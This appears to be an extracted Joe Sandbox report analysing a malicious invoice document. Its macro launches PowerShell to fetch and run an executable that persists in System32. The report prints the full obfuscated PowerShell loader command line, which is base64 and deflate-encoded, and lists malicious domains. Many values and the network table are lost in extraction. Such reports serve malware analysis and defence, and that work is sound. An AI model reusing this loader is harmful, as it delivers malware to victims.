ID: Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version:
Size: px
Start display at page:

Download "ID: Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version:"

Transcription

1 ID: Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version:

2 Table of Contents Analysis Report Overview Information Detection Confidence Classification Analysis Advice Signature Overview AV Detection: Software Vulnerabilities: Networking: Persistence and Installation Behavior: Data Obfuscation: Spreading: System Summary: HIPS / PFW / Operating System Protection Evasion: Anti Debugging: Malware Analysis System Evasion: Hooking and other Techniques for Hiding and Protection: Language, Device and Operating System Detection: Behavior Graph Simulations Behavior and APIs Antivirus Detection Initial Sample Dropped Files Unpacked PE Files Domains URLs Yara Overview Initial Sample PCAP (Network Traffic) Dropped Files Memory Dumps Unpacked PEs Joe Sandbox View / Context IPs Domains ASN Dropped Files Screenshots Startup Created / dropped Files Contacted Domains/Contacted IPs Contacted Domains Contacted URLs Contacted IPs Public Static File Info No static file info Network Behavior Network Port Distribution Table of Contents Copyright Joe Security LLC 2018 Page 2 of

3 TCP Packets UDP Packets DNS Queries DNS Answers HTTP Request Dependency Graph HTTP Packets Code Manipulations Statistics Behavior System Behavior Analysis Process: iexplore.exe PID: 3684 Parent PID: 548 File Activities Registry Activities Analysis Process: iexplore.exe PID: 3740 Parent PID: 3684 File Activities Registry Activities Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 3684 File Activities File Created File Read Registry Activities Key Created Analysis Process: powershell.exe PID: 2200 Parent PID: 2364 File Activities File Created File Written File Read Registry Activities Analysis Process: OSPPSVC.EXE PID: 2380 Parent PID: 424 Analysis Process: 375.exe PID: 2868 Parent PID: 2200 Analysis Process: 375.exe PID: 2852 Parent PID: 2868 Analysis Process: montanacim.exe PID: 2500 Parent PID: 424 Analysis Process: montanacim.exe PID: 2532 Parent PID: 2500 Disassembly Copyright Joe Security LLC 2018 Page 3 of 32

4 Analysis Report Overview Information Joe Sandbox Version: Analysis ID: Start time: 20:07:02 Joe Sandbox Product: CloudBasic Start date: Overall analysis duration: Hypervisor based Inspection enabled: Report type: Cookbook file name: Sample URL: 0h 2m 19s light browseurl.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java ) Number of analysed new started processes analysed: 12 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies Analysis stop reason: Detection: Classification: Cookbook Comments: Warnings: Timeout MAL EGA enabled mal100.evad.expl.win@15/14@2/3 Adjust boot time Correcting counters for adjusted boot time Show All Exclude process from analysis (whitelisted): WmiPrvSE.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Detection Strategy Score Range Reporting Detection Threshold Report FP / FN Confidence Strategy Score Range Further Analysis Required? Confidence Copyright Joe Security LLC 2018 Page 4 of 32

5 Strategy Score Range Further Analysis Required? Threshold Confidence Classification Ransomware Miner Spreading malicious malicious malicious Evader Phishing suspicious suspicious suspicious clean clean clean Exploiter Banker Spyware Trojan / Bot Adware Analysis Advice Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis Copyright Joe Security LLC 2018 Page 5 of 32

6 Signature Overview AV Detection Networking Spreading Software Vulnerabilities Persistence and Installation Behavior Data Obfuscation System Summary HIPS / PFW / Operating System Protection Evasion Anti Debugging Malware Analysis System Evasion Hooking and other Techniques for Hiding and Protection Language, Device and Operating System Detection Click to jump to signature section AV Detection: Antivirus detection for dropped file Multi AV Scanner detection for dropped file Software Vulnerabilities: Document exploit detected (process start blacklist hit) Potential browser exploit detected (process start blacklist hit) Networking: HTTP GET or POST without a user agent Downloads files Downloads files from webservers via HTTP Performs DNS lookups Uses HTTPS Persistence and Installation Behavior: Drops executables to the windows directory (C:\Windows) and starts them Drops PE files Drops PE files to the windows directory (C:\Windows) Data Obfuscation: Binary contains a suspicious time stamp Document contains an embedded VBA with many randomly named variables Suspicious powershell command line found Binary may include packed or encrypted code Spreading: Creates COM task schedule object (often to register a task for autostart) Enumerates the file system Copyright Joe Security LLC 2018 Page 6 of 32

7 System Summary: Document contains an embedded VBA macro which executes code when the document is opened / closed Document contains an embedded VBA macro which may execute processes Powershell connects to network Powershell drops PE file Creates mutexes Reads the hosts file PE file has an executable.text section which is very likely to contain packed code (zlib compression ratio < 0.3) Classification label Creates files inside the user directory Creates temporary files Parts of this applications are using the.net runtime (Probably coded in C#) Reads ini files Reads software policies Spawns processes Uses an in-process (OLE) Automation server Found GUI installer (many successful clicks) Found graphical window changes (likely an installer) Uses Microsoft Silverlight Checks if Microsoft Office is installed Uses new MSVCR Dlls Binary contains paths to debug symbols HIPS / PFW / Operating System Protection Evasion: Very long cmdline option found, this is very uncommon (may be encrypted or packed) Anti Debugging: Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) Checks if the current process is being debugged Enables debug privileges Creates guard pages, often used to prevent reverse engineering and debugging Malware Analysis System Evasion: Checks the free space of harddrives Contains long sleeps (>= 3 min) Enumerates the file system May sleep (evasive loops) to hinder dynamic analysis Queries disk information (often used to detect virtual machines) Queries a list of all running processes Hooking and other Techniques for Hiding and Protection: System process connects to network (likely due to code injection or exploit) Starts Microsoft Word (often done to prevent that the user detects that something wrong) Stores large binary data to the registry Disables application error messsages (SetErrorMode) Language, Device and Operating System Detection: Queries the installation date of Windows Queries the volume information (name, serial number etc) of a device Copyright Joe Security LLC 2018 Page 7 of 32

8 Queries the cryptographic machine GUID Behavior Graph Behavior Graph Hide Legend ID: URL: Startdate: 11/07/2018 Legend: Architecture: WINDOWS Score: 100 Process Antivirus detection for dropped file Suspicious powershell command line found Document contains an embedded VBA with many randomly named variables 3 other signatures started started started Signature Created File iexplore.exe montanacim.exe OSPPSVC.EXE DNS/IP Info dropped 7 37 Is Dropped Factura-jul-734_77...ial:Zone.Identifier, ASCII Is Windows Process Potential browser exploit detected (process start blacklist hit) started started Drops executables to the windows directory (C:\Windows) and starts them started Number of created Registry Values Number of created Files WINWORD.EXE iexplore.exe montanacim.exe Visual Basic Delphi other IPs or domains dropped started C:\Users\...\Factura-jul-734_ [1].doc, 77139Yc , 443 dropped MegaCableSAdeCVMX Mexico Factura-jul-734_77...doc.kusto82.partial, 77139Yc4581 Java.Net C# or VB.NET C, C++ or other language Suspicious powershell command line found Document exploit detected (process start blacklist hit) Is malicious powershell.exe 12 7 gezginyerler.com , 49172, 80 dropped CIZGITR Turkey C:\Users\user\AppData\Local\Temp\375.exe, PE32 started System process connects to network (likely due to code injection or exploit) Powershell connects to network Powershell drops PE file 375.exe Multi AV Scanner detection for dropped file started 375.exe Simulations Behavior and APIs Time Type Description 20:07:28 API Interceptor 354x Sleep call for process: iexplore.exe modified 20:07:42 API Interceptor 5x Sleep call for process: WINWORD.EXE modified 20:07:46 API Interceptor 3x Sleep call for process: OSPPSVC.EXE modified 20:07:46 API Interceptor 1x Sleep call for process: powershell.exe modified 20:07:51 API Interceptor 2x Sleep call for process: 375.exe modified 20:07:53 API Interceptor 2x Sleep call for process: montanacim.exe modified Antivirus Detection Initial Sample Detection Scanner Label Link 6% virustotal Browse Dropped Files Copyright Joe Security LLC 2018 Page 8 of 32

9 Detection Scanner Label Link C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59K Z\Factura-jul-734_ [1].doc C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59K Z\Factura-jul-734_ doc.kusto82.partial 100% Avira HEUR/Macro.Downloader. AMAK.Gen 100% Avira HEUR/Macro.Downloader. AMAK.Gen C:\Users\user\AppData\Local\Temp\375.exe 24% virustotal Browse Unpacked PE Files No Antivirus matches Domains Detection Scanner Label Link shopsforclothes.uk 0% virustotal Browse gezginyerler.com 0% virustotal Browse 6% virustotal Browse 4% virustotal Browse URLs Detection Scanner Label Link 6% virustotal Browse 6% virustotal Browse Yara Overview Initial Sample No yara matches PCAP (Network Traffic) No yara matches Dropped Files No yara matches Memory Dumps No yara matches Unpacked PEs No yara matches Joe Sandbox View / Context IPs No context Domains No context ASN Copyright Joe Security LLC 2018 Page 9 of 32

10 No context Dropped Files No context Screenshots Startup Copyright Joe Security LLC 2018 Page 10 of 32

11 System is w7 iexplore.exe (PID: 3684 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750) iexplore.exe (PID: 3740 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT: /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750) WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet File s\content.ie5\e2pg59kz\factura-jul-734_ doc MD5: 5D798FF0BE2A8970D ACFD9D) powershell.exe (PID: 2200 cmdline: powershell. ( $verbosepreference.tostring()[1,3]+'x'-join'') (new-object SYStEM.IO.cOMprESsiOn.DEFLATesTreaM( [SySteM.i o.memorystream] [system.convert]::frombase64string( 'VZBha8IwEIb/Sj8UojibDzodloIw2cYUkcmQwWCk561JTZOaRGMV//tqJ2N+O+59eI57ww8zSxT6rk5zBBfM0UU rtb+lqoxiemptqrhz5yhs732u4tetqkij0usgc5qx2qiwjtppf74o6pgf3e93aezhftxe4rh3v4i9ml6bdr5knpu9qkgkvmutgt5nrqgwkz6/sqixitmyaly0mfagd2u0v DKV7VhWT6gyKSyn3BXy6y9/fp0Nt4fpQ6+68VmOQjKDbJ2jR1k/VjXewftAFENKomUphWuRMWnH4Sp/C5KA9Ib3JA7zjU9CVPuRw6LskE/SueQdEuEBSfytayfwVggvPhA quhtzpjltnck682iiff0swz8jiq1zf1ye7xjpmhhdhdga1ja7ok1nm/gmzae/nc8/' ), [Io.comPrEssIoN.cOMpREsSIONmoDe]::DEcomPreSs ) foreach-object{new-object SysTEm.IO.StreamREAder( $_,[Text.enCoding]::aScIi ) } FOReACh-OBjEct{ $_.ReadToeND( ) } ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA) 375.exe (PID: 2868 cmdline: 'C:\Users\SAMTAR~1\AppData\Local\Temp\375.exe' MD5: 5CFD7D5DDCE93878D78F788EE599CD4D) 375.exe (PID: 2852 cmdline: C:\Users\SAMTAR~1\AppData\Local\Temp\375.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D) OSPPSVC.EXE (PID: 2380 cmdline: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE MD5: 358A9CCA612C68EB2F07DDAD4CE1D8D7) montanacim.exe (PID: 2500 cmdline: C:\Windows\system32\montanacim.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D) cleanup montanacim.exe (PID: 2532 cmdline: C:\Windows\system32\montanacim.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D) Created / dropped Files C:\Users\SAMTAR~1\AppData\Local\Temp\~DF39AECE6F2D8D91FE.TMP Process: C:\Program Files\Internet Explorer\iexplore.exe File Type: FoxPro FPT, blocks size 258, next free block index Size (bytes): Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 51465E7C75B403C0F8EBA0DFCE495D07 EC3BC8C6C3E C47693CEFD117CDD70 A20AF7F E1F9DC4C6584F3051E5D12E484E2163A65FEFA2F C4 CD861803E56627E7AB6DC5FDCD240C610CBA046BB576149CFACC19C98E8F3DFB80A79426F86EA4ABE5C2AD DF884E188E4A1A2170B251017F4E2860E4EB C:\Users\SAMTAR~1\AppData\Local\Temp\~DFF15FB7F C0.TMP Process: C:\Program Files\Internet Explorer\iexplore.exe File Type: FoxPro FPT, blocks size 258, next free block index Size (bytes): Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 31C6E06C0ED0F3BC1EB446C3C385F86C 7DFF1019DEB1E24703CC DC4EF8481F 0C12D66E4CBF06172D80B1AA F93DA8123C738C24E EA C26B067F22237D AD0F1BF38B7B4A4C58E723851CA5B700F1B6D1584A4DF633282CA52314AD D965546E7A8C4F F7F10A841195F C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{453915F E8-B3E3-CCDA62336E41}.dat Process: File Type: Size (bytes): C:\Program Files\Internet Explorer\iexplore.exe Microsoft Word Document Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: E2F4353DD26ACEF205F93DF0C 96433B9A50F40B33177EDBFD532FE09AFEAA2A5F E676D896E4036A2B5BA E615D157A97387CB07A CAEAD80BFF7BA74A598725A20D45B47BADE2D056991D62D21A23A29090C59D5281DA8F79DE0A0AED6B3C73E05 F78DB902B356D9FFB650039E83B63114F6E9B8A C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{453915F E8-B3E3-CCDA62336E41}.dat Process: C:\Program Files\Internet Explorer\iexplore.exe File Type: Microsoft Word Document Size (bytes): Copyright Joe Security LLC 2018 Page 11 of 32

12 C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{453915F E8-B3E3-CCDA62336E41}.dat Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 52EFE6F720C9479DEA26CEA2F175BD DD7CB2257A1F82A64BC2446E6439A8 F725A88BD294BFBF20F4BB804C3A872CF23F067C04C56E493EB369EE6B D628192D388A9C4933A82644ADD81C5ED51E3F8DF3B12233EF05C62942A662F4DF0446DAD8B9DD134B8DC296C 08847E915B7A2AF907D44D74973D95C7584B96 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ doc.kusto82.partial Process: File Type: C:\Program Files\Internet Explorer\iexplore.exe 77139Yc4581 Size (bytes): Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: Antivirus: 0631F95C9F57F5095D250E84BB817E A2EB7BCFB2BF489E2CB421173CF85BEF5A D61D7065AF231EFB4CBB473355DD4E838C5F0605AD261392C4061CDCA4D EBAE21F36D2BCE0EF24F631392FB9C3A067934F2D A8F2615E86D7E9A35BDE15E587F89EFC 5B8C1A6A979E26981ECCAFB05C87CE8293B60 true Antivirus: Avira, Detection: 100%, Browse C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ doc.kusto82.partial:Zone.Identifier Process: File Type: Size (bytes): 26 C:\Program Files\Internet Explorer\iexplore.exe ASCII text, with CRLF line terminators Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: FBCCF14D504B7B2DBCB5A5BDA75BD93B D59FC84CDD5217C6CF F78DA6B582B EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913 AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC C5C2E53F803CD9E 3973DDEFC68966F974E124307B5043E654443B98 true C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ doc:Zone.Identifier Process: File Type: Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: C:\Program Files\Internet Explorer\iexplore.exe very short file (no magic) ECCBC87E4B5CE2FE28308FD9F2A7BAF3 77DE68DAECD823BABBB58EDB1C8E14D7106E83BB 4E BEDB8B60CE05C1DECFE3AD16B DE01F640B7E4729B49FCE 3BAFBF08882A2D A1B8433F50563B93C14ACD05B79028EB1D A66C276A E26C43B739BC65C4E16B10C3AF6C202AEBB C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ [1].doc Process: File Type: C:\Program Files\Internet Explorer\iexplore.exe 77139Yc4581 Size (bytes): Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 0631F95C9F57F5095D250E84BB817E A2EB7BCFB2BF489E2CB421173CF85BEF5A D61D7065AF231EFB4CBB473355DD4E838C5F0605AD261392C4061CDCA4D EBAE21F36D2BCE0EF24F631392FB9C3A067934F2D A8F2615E86D7E9A35BDE15E587F89EFC 5B8C1A6A979E26981ECCAFB05C87CE8293B60 true Copyright Joe Security LLC 2018 Page 12 of 32

13 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ [1].doc Antivirus: Antivirus: Avira, Detection: 100%, Browse C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48A42F0F-085E-4C91-AAFF-15F0360F0BDE}.tmp Process: File Type: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE data Size (bytes): 1536 Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 86244F16D770E95ECD1FCE98D25CCA90 C88E6E54E4ED808BC9DD655C07E9DC61F7D27A62 D0411AA97C C8C9984D5D00D0217E0879ED11A70A5B63A E0C4A9A82728D483661B EE644533CD7B19D7638A23947CC02A73EEC7E0D8FFE22682FCD415CF05BD6 FB360D4CD33E9FCBE6A048DAD0CBF886179E21 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C0B3E1FE-FA90-46FB-A94C-79F14B48BEF0}.tmp Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File Type: FoxPro FPT, blocks size 0, next free block index , 1st used item "\375" Size (bytes): 1024 Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 5D4D94EE7E06BBB0AF B23A DBB111419C704F116EFA8E72471DD83E86E C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D D997CC5FD1 95F83AE84CAFCCED5EAF C34D5F9710E5CA2D F2FBECCB25F9CF50BBFC272BD75E1A66A 18B7783F09E1C1454AFDA519624BC2BB2F28BA4 C:\Users\user\AppData\Local\Temp\375.exe Process: File Type: Size (bytes): Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: Antivirus: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PE32 executable (GUI) Intel system file, for MS Windows 5CFD7D5DDCE93878D78F788EE599CD4D B437B16D D29C90B7060C95ED128DD 52B9D19F85B3DD673ACA5D7A6BF03AFD EA43EA012F0254D385DA0629 DB2EF069D88AA6BA BCFFDC31283BD96FE3DCD5BADD6A257B1C7E01F319A13C86E DF5423 9DE08ADC9FD7FEF9B00064E1B D0C470 true Antivirus: virustotal, Detection: 24%, Browse C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Process: File Type: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE data Size (bytes): 162 Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 3E7BD B9CFB276BECD6CE969F 55D998570D5B808657E7C140888B339F657E15C4 0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E E 1FA62183BAC9C51409F44D219365B94043CBC5 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5V7KX1H03VFRMGGC1BGX.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 8016 Entropy (8bit): Encrypted: Copyright Joe Security LLC 2018 Page 13 of 32

14 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5V7KX1H03VFRMGGC1BGX.temp MD5: SHA1: SHA-256: SHA-512: Malicious: A895AE1D73CCC0EBF29C10F878D486DE D4D F1F6192AF89A1B706D1864C3C7BB FA7DA62C49E9946F6AB1F0750BE3F8803F47781BEA6B3374DBB3EC1721B6031C 0516CE81D9660C417648DC222915BC12314C46B61BDA3A821628DE6C7A87E32050ECE90FC4684D CC5A94C1C9BFFD043A60F569B8B74FAA \samr Process: File Type: Size (bytes): 116 Entropy (8bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: C:\Program Files\Internet Explorer\iexplore.exe Hitachi SH big-endian COFF object, not stripped 080E701E8B8E2E9C68203C150AC7C6B7 4EF B805758AE1D3B122F9D FE129AE2A7C F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D C11D88B8E355B7B922B B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719 D892B4C0D22BB67BE0D57EAB368BA1BC057E79 Contacted Domains/Contacted IPs Contacted Domains Name IP Active Malicious Antivirus Detection Reputation shopsforclothes.uk true 0%, virustotal, Browse unknown gezginyerler.com true true 0%, virustotal, Browse unknown unknown unknown true 6%, virustotal, Browse unknown unknown unknown true 4%, virustotal, Browse unknown Contacted URLs Name Process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Internet Explorer\iexplore.exe Contacted IPs Copyright Joe Security LLC 2018 Page 14 of 32

15 No. of IPs < 25% 25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs Public IP Country Flag ASN ASN Name Malicious Turkey CIZGITR true Mexico MegaCableSAdeCVMX United States AS GO-DADDY-COM-LLC- GoDaddycomLLCUS Static File Info No static file info Network Behavior Network Port Distribution Total Packets: (HTTPS) 80 (HTTP) 53 (DNS) Copyright Joe Security LLC 2018 Page 15 of 32

16 TCP Packets Timestamp Port Dest Port IP Dest IP Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Copyright Joe Security LLC 2018 Page 16 of 32

17 Timestamp Port Dest Port IP Dest IP Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Copyright Joe Security LLC 2018 Page 17 of 32

18 Timestamp Port Dest Port IP Dest IP Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Copyright Joe Security LLC 2018 Page 18 of 32

19 Timestamp Port Dest Port IP Dest IP Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Copyright Joe Security LLC 2018 Page 19 of 32

20 Timestamp Port Dest Port IP Dest IP Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST 